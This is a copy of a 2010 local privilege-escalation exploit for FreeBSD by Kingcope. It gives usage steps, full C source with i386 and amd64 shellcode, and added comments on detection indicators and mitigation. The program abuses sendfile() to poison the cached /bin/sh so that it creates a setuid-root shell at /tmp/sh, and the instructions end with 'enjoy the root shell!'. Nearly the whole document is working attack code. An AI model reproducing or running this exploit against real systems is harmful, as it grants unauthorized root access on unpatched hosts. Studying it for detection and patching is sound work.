FreeBSD mbufs() cache poisoning local priv escalation v2 by KCOPE ;>

  1. /*
  2. freebsd mbufs() sendfile cache poisoning-priv escalation
  3. x86/x64 local root xpl v2 by Kingcope
  4. 2010
  5. --
  6. tested on: 8.1-RC1, 8.0-RELEASE, 7.3-RELEASE and
  7. 7.2-RELEASE-p8 (xd personally did 7.2 test)
  8. poisons /bin/sh to contain shellcode which does this...
  9. '
  10. chmod a+s /tmp/sh
  11. chown root /tmp/sh
  12. execve /tmp/sh2
  13. '
  14. how to use this is VERY important it is NOT your standard type,
  15. DONT start a listener as normal...let this do its shit..
  16. and then again, there is a MUCH simpler way you could redo
  17. this exploit but, thats for you to find ;) -xd
  18.  
  19. box 1 (TARGET):
  20. $ cp /bin/sh /tmp/sh
  21. $ cp /bin/sh /tmp/sh2
  22. $ gcc cache.c -o cache
  23.  
  24. box 2 (LISTENER):
  25. $ nc -l 7030
  26.  
  27. on box 1 do:
  28. for i386 type:
  29. $ ./cache 1
  30. for amd64 type:
  31. $ ./cache 2
  32.  
  33. ok now lets hope this worked and injected the shellcode,should,
  34. /bin/sh should be execed by the system as root in ~5 mins if lucky :)
  35.  
  36. NOW DO:
  37. $ /tmp/sh
  38. AND cleanup:
  39. # cp -f /tmp/sh2 /bin/sh
  40. enjoy the root shell!
  41. */
  42. // this juarez is now private on #darknet
  43. // http://www.youtube.com/watch?v=JtgInqNNpCI
  44. // http://www.youtube.com/watch?v=IdbRWrY4QBI
  45. #include <sys/types.h>
  46. #include <sys/socket.h>
  47. #include <sys/uio.h>
  48. #include <fcntl.h>
  49. #include <netinet/in.h>
  50. #include <sys/select.h>
  51. #include <sys/stat.h>
  52. #include <strings.h>
  53. #include <stdio.h>
  54. #include <string.h>
  55. #include <err.h>
  56.  
/*
 * main: 2010-era local exploit for a FreeBSD sendfile(2)/mbuf cache-poisoning
 * bug (the header comment above lists the releases the author tested).
 *
 * Defender notes (grounded in what this program visibly does):
 *  - It opens a TCP connection to 127.0.0.1:7030 and sends /bin/sh over it,
 *    partly via write() of a NOP sled + shellcode and partly via sendfile().
 *    A loopback connection to 7030 from an unprivileged shell is the network
 *    artifact to look for.
 *  - Per the header comment the payload does chmod a+s /tmp/sh, chown root
 *    /tmp/sh, execve /tmp/sh2 — a root-owned setuid /tmp/sh and a /bin/sh
 *    whose checksum no longer matches the installed base are the host
 *    indicators; file-integrity monitoring on /bin catches the latter.
 *  - Mitigation is a patched kernel; this is presumably the sendfile/mbuf
 *    issue fixed by a 2010 FreeBSD Security Advisory — confirm against the
 *    advisory list for the release in use [advisory id not on this page].
 *
 * argv[1] selects the payload: "1" = i386 shellcode (str32),
 * "2" = amd64 shellcode (str64); anything else prints usage and returns.
 * Written in pre-C99 style: implicit int return type, and the early
 * `return;` statements carry no value.
 */
main (int argc, char *argv[]) {
    int s, f, k2;               /* s: TCP socket; f: fd of /bin/sh; k2: NOP-sled loop index */
    struct sockaddr_in addr;
    int flags;

    /* i386 payload (what it does is described in the header comment). */
    char str32[]=
    "\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3"
    "\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
    "\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
    "\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";

    /* amd64 payload, same effect per the header comment. */
    char str64[]=
    "\x48\x31\xc0\x99\xb0\x10\x48\xbf\xff\x2f\x74\x6d\x70\x2f\x73\x68"
    "\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
    "\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
    "\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
    "\xe7\x57\x52\x48\x89\xe6\x0f\x05";

    char buf[10000];            /* outgoing block: NOP sled + shellcode, zero elsewhere */
    char *p;                    /* points at buf when write() is reached */
    struct stat sb;
    int n;                      /* reused: syscall results, then byte count for write() */
    fd_set wset;
    int64_t size;               /* bytes of /bin/sh still to account for */
    off_t sbytes;               /* bytes the last sendfile() reported sending */
    off_t sent = 0;             /* running total; updated but never read */
    int chunk;                  /* bytes left in the current 2048-byte sendfile window */
    int arch = 3;               /* 3 = unset; 1 = i386; 2 = amd64 */

    if (argc != 2) {
        printf("[+] Define architecture i386 or amd64 (1/2)\n");
        return;
    }
    if (strcmp(argv[1], "1") == 0)
        arch=1;
    if (strcmp(argv[1], "2") == 0)
        arch=2;
    if (arch == 3) {
        printf("[+] Define architecture i386 or amd64 (1/2)\n");
        return;
    }

    /* Connect to the listener on the loopback address, port 7030. */
    s = socket(AF_INET, SOCK_STREAM, 0);
    bzero(&addr, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(7030);
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
    if (n < 0)
        warn ("[-] Failed to connect");   /* warn(3) reports and continues */

    /* The file being poisoned is /bin/sh, opened read-only. */
    f = open("/bin/sh", O_RDONLY);
    if (f<0)
        warn("[-] Failed to open file");
    n = fstat(f, &sb);
    if (n<0)
        warn("[-] fstat failed");
    size = sb.st_size;
    chunk = 0;

    /* Put the file descriptor into non-blocking mode. */
    flags = fcntl(f, F_GETFL);
    flags |= O_NONBLOCK;
    fcntl(f, F_SETFL, flags);

    /*
     * Alternate between two steps until `size` is exhausted:
     *  1. chunk > 0: push up to `chunk` bytes of /bin/sh to the socket with
     *     sendfile() from a fixed file offset (2048*2 on i386, 1204*6 on
     *     amd64, as written), decrementing chunk/size by what was sent.
     *  2. chunk == 0: write() a freshly built NOP sled + shellcode block to
     *     the socket and reset chunk to 2048.
     */
    while (size > 0) {
        FD_ZERO(&wset);
        FD_SET(s, &wset);
        n = select(f+1, NULL, &wset, NULL, NULL);   /* wait for s to be writable */
        if (n < 0)
            continue;

        if (chunk > 0) {
            sbytes = 0;
            if (arch == 1)
                n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
            if (arch == 2)
                n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
            if (n < 0)
                continue;
            chunk -= sbytes;
            size -= sbytes;
            sent += sbytes;
            continue;
        }

        chunk = 2048;
        memset(buf, '\0', sizeof buf);
        if (arch == 1) {
            /* 256-byte NOP sled (0x90) followed by str32; n counts the
             * sled plus sizeof str32, which includes the string's NUL. */
            for (k2=0;k2<256;k2++) {
                buf[k2] = 0x90;
            }
            p = buf;
            p = p + k2;
            memcpy(p, str32, sizeof str32);
            n = k2 + sizeof str32;
            p = buf;
        }
        if (arch == 2) {
            /* 100-byte NOP sled followed by str64, same accounting as above. */
            for (k2=0;k2<100;k2++) {
                buf[k2] = 0x90;
            }
            p = buf;
            p = p + k2;
            memcpy(p, str64, sizeof str64);
            n = k2 + sizeof str64;
            p = buf;
        }
        write(s, p, n);   /* return value not checked */
    }
}